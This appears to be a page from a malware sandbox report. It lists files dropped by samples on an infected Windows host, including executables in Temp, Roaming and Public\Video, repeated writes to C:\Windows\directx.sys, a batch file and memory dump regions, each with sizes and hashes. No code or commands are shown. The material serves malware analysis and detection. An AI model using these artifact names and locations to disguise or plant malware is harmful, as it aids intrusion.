C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3bedb4bdb17718fda1edd1a8fa4289dc61fdda598474b5648414e4565e88ecd5.exe.exe

Filesize
416KB

MD5
ab3d0c748ced69557f78b7071879e50a

SHA1
30fd080e574264967d675e4f4dacc019bc95554c

SHA256
3bedb4bdb17718fda1edd1a8fa4289dc61fdda598474b5648414e4565e88ecd5

SHA512
63feab0d0fc5d296f51022bd2b7bf579c60ef2131b7f1005361e0f25ccc38c26211b61775408c68fe487b04a97d0e9ad35c7d96ef49f06eb7542c177acad1432

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5.exe.exe

Filesize
56KB

MD5
f44b714297a01a8d72e21fe658946782

SHA1
b545bf52958bae0b73fcab8d134ef731ac290fe5

SHA256
3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5

SHA512
7507db2d07b0a2a9a6088b1ad23c6e63a7cbd834cf9c2742d044c891b7f5f5339aa680a1851b7c1db3acda15d64f1077dc65abdc2bce540e13c8e29ccb839add

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15.exe.exe

Filesize
336KB

MD5
3771b97552810a0ed107730b718f6fe1

SHA1
f57f71ae1e52f25ec9f643760551e1b6cfb9c7ff

SHA256
64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15

SHA512
b6a18449b145749d57297b91d6f6114d974b3665ffc9d8ab001e349cc9f64c6df982a0fee619f0fa8b7892bfc7e29956bd9fbe28c5f13f1e0431f4ac32d47b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9bd32162e0a50f8661fd19e3b26ff65868ab5ea636916bd54c244b0148bd9c1b.exe.exe

Filesize
136KB

MD5
b7cf3852a0168777f8856e6565d8fe2e

SHA1
1cbc9d531ba0e5e67a1ada95cff19bf0020f88f8

SHA256
9bd32162e0a50f8661fd19e3b26ff65868ab5ea636916bd54c244b0148bd9c1b

SHA512
7c6afd2e3c2d55d8b89f244cac01ae1ea250dd50b1f349a0d1aa39d5e931de722feb874d877dc7a5fe81aa89c8ec39643ca8b3cbbbcd892e3f3480094a4f24c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\B14299FD4D1CBFB4CC7486D978398214.exe.exe

Filesize
384KB

MD5
6dee5af4af23e5d5a44d714314eab05e

SHA1
9fba24fd7f8f7a4741f8e5c7dca60a6d1cf990e2

SHA256
792ffb200f323aadfa34343e204ab54c133cee5bdd594ff922ec3b08d7ac53e9

SHA512
581834cd27f8de1400b7847b800b42ffe73b857f4f4a2a8a416032457abe7d845e3fa554222c50369d9417127a6293f48982c0227911c2b8b10b05f235c9c02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a38df3ec8b9fe52a32860cf5756d2fe345badafd7e74466cd349eb32ba5cc339.exe.exe

Filesize
20KB

MD5
a5bd39bf17d389340b2d80d060860d7b

SHA1
120f60dd1712956dac31100392058a3dd3a3aebb

SHA256
a38df3ec8b9fe52a32860cf5756d2fe345badafd7e74466cd349eb32ba5cc339

SHA512
e4484a19f651df5d9eca8f7ffcaa2efe54cfe8c54e675aeb568b0877ba7096b8fdb8604b48aee97ea4901a0054130e3f703242e378a3a87bb8ad91b64396ee16

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\aed230b6b772aeb5c25e9336086e9dd4d6081d3efc205f9f9214b51f2f8c3655.exe.exe

Filesize
91KB

MD5
a158607e499d658b54d123daf0fdb1b6

SHA1
a09d30954061f1fb028146abd5d6c16f532daa7b

SHA256
aed230b6b772aeb5c25e9336086e9dd4d6081d3efc205f9f9214b51f2f8c3655

SHA512
d81b66b1404ee0081678e0db042fed2006e24a55ed3202c5fcd7101d30570c498ea840e012f83b9f785974dd3582d588147edce8fa311cbcb157509c54b9fdf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\c7128e2772b4f8c59943028e205d1b23c07f36206c1c61a05645c7bf143b24ee.exe.exe

Filesize
56KB

MD5
e0e092ea23f534d8c89b9f607d50168b

SHA1
481e3a0a1c0b9b53ced782581f4eb06eaed02b12

SHA256
c7128e2772b4f8c59943028e205d1b23c07f36206c1c61a05645c7bf143b24ee

SHA512
c0f33b758f128f22e2e3c869148880570fc37c72a4a5e8cbb8ac52d46990cbe6f8b54c053a2254b43a18dd1e07b40b1fb046fc519c19ad1025a080c3a0de5e58

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe

Filesize
5.3MB

MD5
5308aacaa532afd76767bb6dbece3d10

SHA1
31588d24439c386740830ee4d32f9d389bcf6999

SHA256
b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb

SHA512
0aaaa0862d9b15b9ad423bde6f5edf95f1309924d0645305739004f072a3c2eba6cc66af1892a29af8b8c16424e89ab166b5f23860592f8d72726fe2883e45ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\6674ffe375f8ab54cfa2a276e4a39b414cf327e0b00733c215749e8a94385c63.exe.exe

Filesize
6B

MD5
d58e3582afa99040e27b92b13c8f2280

SHA1
553ae7da92f5505a92bbb8c9d47be76ab9f65bc2

SHA256
4bac27393bdd9777ce02453256c5577cd02275510b2227f473d03f533924f877

SHA512
b119701f3d3eaa97d998a4e8021307785e7f107f26d4f9f72f1cc58591a712ea84e1c2349335412e307c518d572526b2f92c7a8d20d0cd108ee97654e3455d5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezrzxwgb.pn5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\biclient.exe

Filesize
217KB

MD5
1bdf5e5015efcaa68b05cec0a79be484

SHA1
d22ad1dc1deeb043b4668c5f6b9b59e8b64cbea7

SHA256
f613d98031efc7359c708b9d8a11573526c49e4b60d2614e56747927fa6c2d7b

SHA512
9844b43738b1bae5fb326be8910e9d5a7cf7c6a5838c7ddddb2a04dc72794eff9da87922bc57a228f90ed563e768e56fb5d944a57a452f568272392d0a7d1830

Download Submit
C:\Users\Admin\AppData\Local\Temp\config.ini

Filesize
79B

MD5
02c10dc34553fb5fa9d912e75427bb82

SHA1
6306666add9404c49d17233cada3a9bfabab8076

SHA256
bc30a32cc8afd9322b26bf19587785dff65cf47204ca5c53cb3c314947e895f3

SHA512
f04296e38b29062d63e4cf8192fd7a342d27e973b1f2b593ed832cadea30127da48b7b63d9114489f6ba9e29371259d43120839a401760588304211946455e51

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsr6C0F.tmp\System.dll

Filesize
11KB

MD5
c17103ae9072a06da581dec998343fc1

SHA1
b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

SHA256
dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

SHA512
d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Download Submit
C:\Users\Admin\AppData\Local\Temp\utilview.exe

Filesize
27KB

MD5
7a1f26753d6e70076f15149feffbe233

SHA1
4cfd5c3b5bdb2105da4172312c1cefe073121245

SHA256
1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7

SHA512
8232cf24265c5a061681d38acd06e0b042cc91b2d311f8b11634c3295f525a26112c0c18169a5aa168072160c129d56caa017784f99fd758b0a9cc1e794b89b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\wovoletir.exe

Filesize
56KB

MD5
41859ac8b90080471dfb315bf439d6f4

SHA1
672dd1b74942e9d62c157d1973efb2e5e1bb5329

SHA256
73ebf8c9571f00c9923c87e7442f3d9132627163c5a64e40ad4eb1a1f2266de9

SHA512
7ce44a262eb41dc87a95b7a1b200aa1380f101854f63cad9fcecea98d0a92f61f226c0b51fbb91977448d7ad580ccabaae35a9ee3d8ae13d92c85273b3846fa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytk.bat

Filesize
71B

MD5
e6b031b9b7d40fa332ebc6f38b2f9f64

SHA1
d6dbffcfcc6a26188fd8d2e5b6257af4821fb48f

SHA256
66a04ff993916bce61351e4c3b94ea079c806efb1723c7cd79bd32aaf6847e0b

SHA512
7d17655334fcda4c3326110d340fd91cd23ee284dec99c3a8bbc8408342fda5f51e27aaba75fba4cccd513c342c22f07ad2cf6e2326ba575e3cc0eba4ea91948

Download Submit
C:\Users\Admin\AppData\Local\Temp\~Ne10.tmp

Filesize
1KB

MD5
e80964c07a7854c31f3da417ac947582

SHA1
2ff32f9e0ae1720d56b45daf37c2efa0bce0b166

SHA256
bdfc1fa349f5a653d3038d2d99197be5379562b4a089dad18c6901379547e64f

SHA512
f9e8ebeec4cda2b7c5bbbdfb260a90eea96bc50eeca1e57101506c50463838d8b7527256602b69455b08d3d70fd7eaf4d8cd4c8f3141ad63e4b373703377784c

Download Submit
C:\Users\Admin\AppData\Local\Temp\~Ne70D.tmp

Filesize
32KB

MD5
c879cde72d257215cb0a06f8b1aad76e

SHA1
307c5cfd3eefeb0a1678a39939d2c1c9e572b039

SHA256
b288c3c6bb30ef60a7b1cceebeb533d91bcb7450f4126f58363f1c005806b209

SHA512
110d4aa23753acfc6f889b59d2b4aafaafeb5835f93d9debce19c12edcbdb3f4c88610126282b69d1a6321582a5f2e315c28fb27e6103e0ce51587eeebf29581

Download Submit
C:\Users\Admin\AppData\Local\Temp\~Ne7F4E.tmp

Filesize
20KB

MD5
8e7088c74470eac7d184e41fb89a6afa

SHA1
e36dfd23c6436d25c2621823d73b97c6331df307

SHA256
17826edd064c8ec9cbe69f5eee1f33190d624a046763c538ebdbe2879ba071bb

SHA512
ae15d739af06531e0cf16ddb54fbe9559b5d17c6a3b2cbb4a225f8a476c35e92a1a55264c25161e7b43cb255f7a8ad5cae4c9a06ae9e4aeb4216a9be590a94c3

Download Submit
C:\Users\Admin\AppData\Roaming\3193CB39B3.exe

Filesize
251KB

MD5
829dde7015c32d7d77d8128665390dab

SHA1
a4185032072a2ee7629c53bda54067e0022600f8

SHA256
5291232b297dfcb56f88b020ec7b896728f139b98cef7ab33d4f84c85a06d553

SHA512
c3eb98e3f27e53a62dcb206fcd9057add778860065a1147e66eac7e4d37af3f77d2aab314d6ef9df14bf6e180aed0e1342355abaa67716153dd48ae9609ca6e1

Download Submit
C:\Users\Admin\AppData\Roaming\fsaqqop.exe

Filesize
284KB

MD5
209a288c68207d57e0ce6e60ebf60729

SHA1
e654d39cd13414b5151e8cf0d8f5b166dddd45cb

SHA256
3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370

SHA512
ce4a7e42738154183fc53702f0841dfd4ad1eb0567b13cc1ff0909f1d330e9cd2fb994375efc6f02e7eddaaae1f465ff93458412143266afdaff1c6bf6477fc3

Download Submit
C:\Users\Admin\AppData\Roaming\jusched.exe

Filesize
59KB

MD5
1efeb85c8ec2c07dc0517ccca7e8d743

SHA1
5563e4c2987eda056b3f74716c00d3014b9306bc

SHA256
036e4f452041f9d573f851d48d92092060107d9ea32e0c532849d61a598b8a71

SHA512
ece53b859870a72dbbc4e6cfe408ade28d9cc86b22c12176d6e2c270b7110d1ef2bc73b5fee640f88af17f243ab87bc2a57864081aae2f87b8b47b1b46238fb2

Download Submit
C:\Users\Admin\ruxiv.exe

Filesize
300KB

MD5
82c11303b705b58d6147988e27306e86

SHA1
0f956ba6dfe41a3f687050e06d3de01e117d35f5

SHA256
f6f999c02cfa3aebe4f90e4a7f3ef4699b022777f381a705188f1a67a3003831

SHA512
f25653255330049bce8b453ff78c6973544299b5213d23c966256455c77e1ea8e91965fa34892e82577d8ee833d02e820659cc72bf5f01977487e29b577cee4c

Download Submit
C:\Users\Public\Video\frame.exe

Filesize
498KB

MD5
2d411dc28a5faeb5893d7769b7c3b8a4

SHA1
1db46d9a9e27146ca12dcc9caff51ede700cf026

SHA256
b218fb4573b6c8fff51870de463a793238a4f317ce9abdcf8352954f92328eac

SHA512
5aab004d78dc87528f8965426d446dde68f8c8ff4a34cfecf1b69ade65b625f15d34fccbf4629ff42e49410379bd447eaa4f2339f11483d950e174a7d5aa8804

Download Submit
C:\Users\Public\Video\hrss.exe

Filesize
214KB

MD5
747d4870a9e1504b1f802fce83704bb1

SHA1
cb5b1fb54a6f1081d985dc44462983e31778d9d5

SHA256
3a04dd93ec9da19781ba97412b466452a9682a390f2cf4426f722e424465fb19

SHA512
03adf5635828256581a4ec708c3734eebd11e603f9a4e3bd6a3149fcf525a85bf45ad4b880b0de37b9658794c88ad3cd6f9a4a43e4f6ad4bd01110d72a502a12

Download Submit
C:\Users\Public\Video\lphsi.exe

Filesize
201KB

MD5
0bafccfaec9c7d45ce491e4b0ddc1bdf

SHA1
f0fa26da45d04ca36e9eb0acbc2d8ddce881e096

SHA256
9da1a55b88bda3810ccd482051dc7e0088e8539ef8da5ddd29c583f593244e1c

SHA512
c32b734420be1ee3a54dfea117f2fb14353fbd39831d8bbe8a4515c983f0781c38d4bcc8a6c5fd0785693fa3a16add499387bd8add21f706c9927d537e38184e

Download Submit
C:\Users\Public\Video\movie.mp4

Filesize
4.3MB

MD5
6db2f5ec1a147474049457da8a8b4e19

SHA1
2c27ea1a99da4d75e56bb1db0ba4476ef024db90

SHA256
f2f673e454a9b91653b4c0dbaa12bafaef2151013dc78c9235339c4ca03c48e3

SHA512
fc8eb7937940c08551b120408ce4920de5aa4aee3f53aab7e16328d4572c1dc5397fbd8f1b5f185f32b0addf31a35272ec8bf390725b566427eff2f801eb27d8

Download Submit
C:\Windows\Microsoft Help\Secure\Admin.tc.dat

Filesize
6B

MD5
66d41c34288df9ae36b3963c509fbda5

SHA1
8e46ff486e6a060f13d1e780acbd8d1a8deff837

SHA256
13e5ed478bc533724fa1306cc4efcad450c1f714cd9a2135b39fcb74e0cca0b5

SHA512
209432677d4162227917195e40f8b5447fae8a6de4f9ccd45d2792f89984b28baa15d895ddd063814b7c9a32e5398b2c1fe1929ce27e36c417e16d46a268af85

Download Submit
C:\Windows\SysWOW64\28463\DPBJ.exe

Filesize
646KB

MD5
b863a9ac3bcdcde2fd7408944d5bf976

SHA1
4bd106cd9aefdf2b51f91079760855e04f73f3b0

SHA256
0fe8e3cd44a89c15dec75ff2949bac1a96e1ea7e0040f74df3230569ac9e37b0

SHA512
4b30c3b119c1e7b2747d2745b2b79c61669a33b84520b88ab54257793e3ed6e76378dea2b8ff048cb1822187ffdc20e921d658bb5b0482c23cfa7d70f4e7aa1a

Download Submit
C:\Windows\directx.sys

Filesize
82B

MD5
8391ea92aa508b668effccbf3ddac093

SHA1
e4441b5cb1c237115e0b0d83d67c532772eb8667

SHA256
ee6179356a9a6781b7586803f399d5e6be1099017753f4470ac929f22e2b0940

SHA512
356a638a56f7def5fa4810d6ff50c21af6c1dd5648f27fe6ace13eb076184e37b685a0e5ddea0639b911356a134858e0aee826751b2111f8ff1615c4ee28c321

Download Submit
C:\Windows\directx.sys

Filesize
70B

MD5
32ebd5bf3e4adfbbc08d6a585fbce399

SHA1
96f693055bba2a4f595c8f093eed2097dd4363bf

SHA256
f448952d1182d80e066d84a7ab138498eb1258cdb46f810f6b27bb4d0bfc4396

SHA512
cabc4b5c08c86de06d476d4480184d234362d25f91b4a56d3677103f85b8100252758125cb74c1f3504b02d7072489f6fb763981a2ea84dd33cb6b525d923357

Download Submit
C:\Windows\directx.sys

Filesize
121B

MD5
8788bffa0d8c6959a6ea557cd79a0aca

SHA1
902910250643c6ba00cd288c903079dcdb454952

SHA256
fbd30b7dbebe6e69d1f668a71e16796ca50ec9d91f5fcb530a31ee3c0094ac3e

SHA512
8b8b16f854523c3498246b5b75337dc72b882ac000ccd0073379a273688bc9a3eb22dfbcc50e4d68fca4b93cf3e6ded4454f235fc0dd5df23a738d9b4f52ad26

Download Submit
C:\Windows\directx.sys

Filesize
170B

MD5
3559ba6f69effc41e1ac97bed11e7baa

SHA1
a596acff3f961e0131803324b93c7beff1ccc7ef

SHA256
9b3a69d38d48fc889ae7236a611d9aac9f34f996cea78dbfde683cf607cadbf4

SHA512
27caed53ca3c93ca442b2202bdf4b2bb602a1753f90108bb0fd1148403890d1e26809161da6cfa4be8ac43aeafcbd270f6341005dc7d1c4fe73e1aa9a921fd94

Download Submit
C:\Windows\directx.sys

Filesize
206B

MD5
b7d8bfe808d2044fae5d7c7b8061c3d8

SHA1
50638fc43abe4873910cc4acb9295358f30776ac

SHA256
e58f5b51322568675a8ca14c1bac027d193e8c464b588e6436e1a4281c1971ba

SHA512
dc04e63b23f9ae5bf1083f1eac4dcd508a5126de4fce9c653065ca297be611575ff0047a15e16eab921327f5260606e9ba893a208c0f8dc9d082fb8ebb8637c8

Download Submit
C:\Windows\directx.sys

Filesize
206B

MD5
b7d8bfe808d2044fae5d7c7b8061c3d8

SHA1
50638fc43abe4873910cc4acb9295358f30776ac

SHA256
e58f5b51322568675a8ca14c1bac027d193e8c464b588e6436e1a4281c1971ba

SHA512
dc04e63b23f9ae5bf1083f1eac4dcd508a5126de4fce9c653065ca297be611575ff0047a15e16eab921327f5260606e9ba893a208c0f8dc9d082fb8ebb8637c8

Download Submit
C:\Windows\directx.sys

Filesize
180B

MD5
cce8ccbac82e5064fff0a3d7cda16553

SHA1
b599088e3e31d0436fde712e5a0326c2ffda0edc

SHA256
bbc88423d3b57db121af408dbeb0bf0259f32d38723df2b91d66ab6cab950442

SHA512
d412274ff00e76947e4909cab8ddd697429973ac1b1b220e747c116d141d1e2a1fdbee2aba550e5c888a2b2a31c923049c1ea03a6a68a1e5b3fa1621b664bb05

Download Submit
C:\Windows\directx.sys

Filesize
182B

MD5
a7e39487713c40a1f64e5bb05193cc87

SHA1
5eb53f9f894fd174c0711d0b273b513e51aa794e

SHA256
1595e416c3df1b6adf34c1cd75de4f38aaf4f5f91d35cddb5e0fc80f181caa7f

SHA512
2d5840bdfdc57f44289cca0c75985f9de5442cdb8946995cd202f1fc5cae4bea436e5dffea1dae91dbe52ccebeee7492120e82fc5994ec19c2fa2ffd4fa5a726

Download Submit
C:\Windows\directx.sys

Filesize
178B

MD5
b73d3556fd572c435d9599941c86b479

SHA1
592bdda95b36be7496a4f3a850d7511a87b43312

SHA256
b4d603828504835a52e91b7c6062f5702cde5269a9ac2a11138810c368956bc2

SHA512
bc82e09e432f32fcbf3f1ba36e50c79c38505fcde089e6446900178ecb3b4b8b36ca6c6359b266ba77c998cfeeb14d7abdb8d7d1830bd30bf6bdfb5df7e375ed

Download Submit
C:\Windows\directx.sys

Filesize
223B

MD5
2b04c6a9632ba6260ee4ac215d9b113a

SHA1
bbbb11ed76d489882cf74d672901770611c257f3

SHA256
c049f73255fb4c3b1353676980d593bc9a693fe91f3dc026f8d4ac833556cccf

SHA512
168405dce53099bd25f790f5d282fe4685bfdcb4f1ca593ca0fdfe92199f0c07382c298fc22be5a913d0e72494d3a9231b52f085d808cbb13eec77748fa9fcbc

Download Submit
C:\Windows\directx.sys

Filesize
223B

MD5
8e50648233422f7e182fbe04ee79ae7e

SHA1
4ab1ac350a6a12ee6342a3e51e0fc914facaf1de

SHA256
3da78e17f243a56d9283dd7c99907b668f3c510686275b2c1066ddd8cd0d1d31

SHA512
a68d40515bac755c8eb44147bf404f76d6ed724ec557b7ec9dfd46d44a0526d3da4e15e6a78bda7cc0b8406cf9e6813ec7a4c7aead7b0097fdab5ed7632b21cb

Download Submit
C:\Windows\directx.sys

Filesize
280B

MD5
e8ac43a57b84a417b7499a4939b07386

SHA1
91ed28666bba2385094b1020e409fdb3bc54f761

SHA256
77408c9846760375a3c46dbed6a4ff1aa7bf5475f5f68329614a71bf899e26b2

SHA512
4b45973393d71b74beac00958f65fc8ad7b990a3cfde55c8de2bd70ff5440f16c78b15624d93178bcbda1e31b202408a46ee7ccac75eb4ab7dab915f45646fdb

Download Submit
C:\Windows\directx.sys

Filesize
252B

MD5
eb960d4df6f334c9954889c0c06ed93a

SHA1
a2821cc399f7dd7f1d63ef5c75f05d77cbebba53

SHA256
8a8ff5beb413a8d30f008e940bc6f1719a49e2df8489c6baf742ddbea9c11660

SHA512
87cf6c0640b5044f49acafb0f50e84beb6868cacbaa19d0714c93df4303dfe055be51229c92e59bc28e0bf61891e98c84f3efacff9f28d5d4c14d47084be812b

Download Submit
C:\Windows\directx.sys

Filesize
252B

MD5
eb960d4df6f334c9954889c0c06ed93a

SHA1
a2821cc399f7dd7f1d63ef5c75f05d77cbebba53

SHA256
8a8ff5beb413a8d30f008e940bc6f1719a49e2df8489c6baf742ddbea9c11660

SHA512
87cf6c0640b5044f49acafb0f50e84beb6868cacbaa19d0714c93df4303dfe055be51229c92e59bc28e0bf61891e98c84f3efacff9f28d5d4c14d47084be812b

Download Submit
C:\Windows\waccess3480.tmp

Filesize
12B

MD5
90e12ef91e007e3e947a0a134b1d63a0

SHA1
89576f2fbc05cda06967323451d84d5e9d5954ee

SHA256
b8ab89dd822ebe4dc614d3a9f0f9a8e96fefc643d3d4e1fc521477fe9064de64

SHA512
262a4c9f7cdfb573e5fe837dad87d1e8f767ceb031b4ba080fbff8ae6b0294b3325c515ad4d18b208476d821fdd3140b7d9419e39fbfd868f3c89333597b199b

Download Submit
C:\odt\OFFICE~1.EXE

Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
memory/280-2395-0x0000000073060000-0x0000000073611000-memory.dmp

Filesize
5.7MB

Download
memory/576-694-0x0000000000070000-0x00000000002FE000-memory.dmp

Filesize
2.6MB

Download
memory/576-869-0x0000000000070000-0x00000000002FE000-memory.dmp

Filesize
2.6MB

Download
memory/1180-883-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/1200-992-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1200-790-0x00000000022A0000-0x00000000023A0000-memory.dmp

Filesize
1024KB

Download
memory/1200-796-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1360-1622-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/1460-3227-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/1460-3195-0x00000000014A0000-0x00000000014B0000-memory.dmp

Filesize
64KB

Download
memory/1460-2544-0x000000001B970000-0x000000001BD9E000-memory.dmp

Filesize
4.2MB

Download
memory/1460-3187-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/1472-812-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/1472-821-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/1544-820-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1544-788-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1652-799-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/1652-709-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2004-814-0x0000000000010000-0x000000000001D000-memory.dmp

Filesize
52KB

Download
memory/2012-1998-0x00007FFB46FE0000-0x00007FFB47AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-684-0x00007FFB46FE0000-0x00007FFB47AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-688-0x0000000000D40000-0x0000000000D50000-memory.dmp

Filesize
64KB

Download
memory/2012-653-0x0000000000470000-0x0000000000480000-memory.dmp

Filesize
64KB

Download
memory/2144-1406-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2276-1137-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2332-1678-0x000000001C5F0000-0x000000001CABE000-memory.dmp

Filesize
4.8MB

Download
memory/2332-1695-0x000000001CB60000-0x000000001CBFC000-memory.dmp

Filesize
624KB

Download
memory/2332-3171-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/2332-1620-0x0000000001730000-0x0000000001748000-memory.dmp

Filesize
96KB

Download
memory/2332-3246-0x00000000017A0000-0x00000000017B0000-memory.dmp

Filesize
64KB

Download
memory/2332-3173-0x00000000017A0000-0x00000000017B0000-memory.dmp

Filesize
64KB

Download
memory/2760-786-0x00000000004B0000-0x00000000004B2000-memory.dmp

Filesize
8KB

Download
memory/2760-875-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2760-690-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2780-1733-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2780-807-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2780-1957-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3264-868-0x0000000000C60000-0x0000000000C7A000-memory.dmp

Filesize
104KB

Download
memory/3380-1895-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3380-2508-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3380-787-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3424-946-0x00000000009E0000-0x00000000009F4000-memory.dmp

Filesize
80KB

Download
memory/3424-802-0x00000000009E0000-0x00000000009F4000-memory.dmp

Filesize
80KB

Download
memory/3668-855-0x0000000001450000-0x0000000001464000-memory.dmp

Filesize
80KB

Download
memory/3668-801-0x0000000001450000-0x0000000001464000-memory.dmp

Filesize
80KB

Download
memory/3996-1624-0x0000000001000000-0x0000000001018000-memory.dmp

Filesize
96KB

Download
memory/3996-3031-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/3996-1819-0x0000000000F90000-0x0000000000F98000-memory.dmp

Filesize
32KB

Download
memory/3996-3147-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/3996-3120-0x0000000001180000-0x0000000001190000-memory.dmp

Filesize
64KB

Download
memory/4252-890-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4312-823-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4312-784-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4316-1796-0x0000000073060000-0x0000000073611000-memory.dmp

Filesize
5.7MB

Download
memory/4384-1896-0x0000000073060000-0x0000000073611000-memory.dmp

Filesize
5.7MB

Download
memory/4424-1419-0x00000000004B0000-0x00000000004CC000-memory.dmp

Filesize
112KB

Download
memory/4424-2927-0x00000000065D0000-0x0000000006636000-memory.dmp

Filesize
408KB

Download
memory/4424-2675-0x00000000721B0000-0x0000000072960000-memory.dmp

Filesize
7.7MB

Download
memory/4504-852-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4512-800-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4808-817-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/4808-824-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/5112-1734-0x00007FFB443B0000-0x00007FFB44D51000-memory.dmp

Filesize
9.6MB

Download
memory/5112-1629-0x0000000000EB0000-0x0000000000EC4000-memory.dmp

Filesize
80KB

Download
memory/5160-1405-0x0000000000400000-0x000000000049B000-memory.dmp

Filesize
620KB

Download
memory/5256-2521-0x0000000001F80000-0x0000000001F9B000-memory.dmp

Filesize
108KB

Download
memory/5256-2523-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5308-1821-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/5308-1894-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/5308-1890-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/5308-2349-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/5388-2522-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5388-2519-0x00000000020E0000-0x00000000020FB000-memory.dmp

Filesize
108KB

Download
memory/5704-2999-0x0000000000010000-0x0000000000013020-memory.dmp

Filesize
12KB

Download
memory/5772-1920-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/5772-1905-0x0000000000400000-0x0000000000403000-memory.dmp

Filesize
12KB

Download
memory/5884-2971-0x00000000050C0000-0x00000000056E8000-memory.dmp

Filesize
6.2MB

Download
memory/5884-3109-0x0000000004DF0000-0x0000000004E56000-memory.dmp

Filesize
408KB

Download
